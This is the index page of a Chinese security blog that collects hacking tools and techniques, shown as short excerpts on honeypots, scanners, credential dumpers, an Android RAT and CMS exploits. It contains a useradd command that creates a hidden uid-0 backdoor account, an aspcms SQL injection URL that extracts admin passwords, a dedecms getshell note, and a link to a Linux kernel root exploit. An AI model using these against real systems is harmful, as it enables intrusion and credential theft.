本博客只做技术文章、工具的收藏!

feed订阅 新浪微博 你好,欢迎光临! 

SSH蜜罐工具 – HonSSH

2013.08.14 , , 4 Comments ,

HonSSH是一个高交互蜜罐解决方案,在攻击者与蜜罐之间,可以创建两个独立的SSH链接,它的特点如下: 1、捕获所有链接尝试,并记录到文本文件中 2、当攻击者发起密码尝试的时候,HonSSH可以自动更换他们的密码(spoof_login),让他们以为自己猜测到正确的密码。 3、所有交互都会记录到,可以使用Kippo playlog重放 4、攻击者的会话都捕获在一个文本...

N-Stalker WEB漏洞扫描器

2013.08.14 , , No Comments ,

N-Stalker Web漏洞扫描器是N-Stalker公司研发的一个顶级的安全评估工具。通过与知名的N-Stealth HTTP Security Scanner及其35,000个web攻击签名数据库合并,以及正在申请专利的web应用程序安全评估技术组件,N-Stalker Web漏洞扫描器能为你的web应用程序彻底消除大量普遍的安全隐患,包括跨站点的脚本和SQL ...

OWASP出品:Xenotix XSS漏洞测试框架

2013.08.9 , , No Comments ,

OWASP Xenotix XSS Exploit Framework是一个高效的跨站脚本漏洞(XSS)检测和攻击测试框架。它通过特有的三大浏览器引擎(包括Trident, WebKit和Gecko)进行安全扫描检测,并且其号称拥有全世界第二大的XSS测试Payload,同时具有WAF绕过能力。 扫描模块   Manual Mode Scanner Au...

Linux非交互式shell下渗透技巧

2013.07.19 , , 2 Comments ,

首先添加管理员账号 执行命令 useradd -u 0 -o -g root -G root -d /home/admin admin 说明: -u 0 指将uid指定为0(零)与root相同,登录后的提示符为#而非$. -o 指因为重复了uid(与root帐号的uid重复)必须指定这个参数. -g root 初始化组的组名,当用户属于多个组时,(在-G参数中...

在Kali Linux上安装Gerix-wifi-cracker

2013.07.10 , , No Comments ,

刚刚装好Kali的时候,我就惊奇的发现Gerix居然被删除掉了,查了一下才发现原来是因为Gerix默认装的是QT4,而Gerix是QT3的,要安装到Kali上面比较麻烦,另一个破解攻击fern用得我蛋疼,无法看到具体信息也无法导出握手包,简直是太恶心了。 现在好了,有人把Gerix移植到了QT4上面,不过貌似才刚刚开始,我测了一下我的机器上运行起来还是存在问题的。...

dedecms最新版本修改任意管理员漏洞及getshell

2013.06.7 , , 24 Comments ,

此漏洞无视gpc转义,过80sec注入防御。 补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL? 起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。 include/dedesql.class.php if(isset($GLOBALS['arrs1'])) { $v1...

hash注入神器WCE发布1.4 Beta版本

2013.06.6 , , No Comments ,

Windows Credentials Editor (WCE)是一款功能强大的windows平台内网渗透工具,它可以列举登陆会话,并且可以添加、改变和删除相关凭据(例如:LM/NT hashes)。这些功能在内网渗透中能够被利用,例如,在windows平台上执行绕过hash或者从内存中获取NT/LM hashes(也可以从交互式登陆、服务、远程桌面连接中获取)以用于...

Android远程控制工具——AndroRat

2013.06.3 , , 7 Comments ,

Androrat是一个客户/服务器模式的JAVA Android应用。而Androrat这个名字也很好理解,顾名思义,是Android和RAT (Remote Access Tool)的合体。 这个工具是一个大学四年级团队的安全项目,这款应用的目的是远程操控android设备并且从中获取信息。 注意:安全测试工具,禁止非法用途 功能   获取联系人信息 获...

aspcms各版本漏洞0day集合

2013.06.2 , , No Comments ,

admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from aspcms_user where userid=1 ——————...

linux root exp for 2.6.37-3.x.x x86_64

2013.05.28 , , No Comments ,

国外黑客发现Linux 内核2.6.37-3.8.9版本一个漏洞,成功利用该漏洞可能获得特权用户,还算新鲜,转来给大家看看。比较好用的~ http://fucksheep.org/~sd/warez/semtex.c linux 2.6.37-3.x.x x86_64, ~100 LOC   /* * linux 2.6.37-3.x.x x86...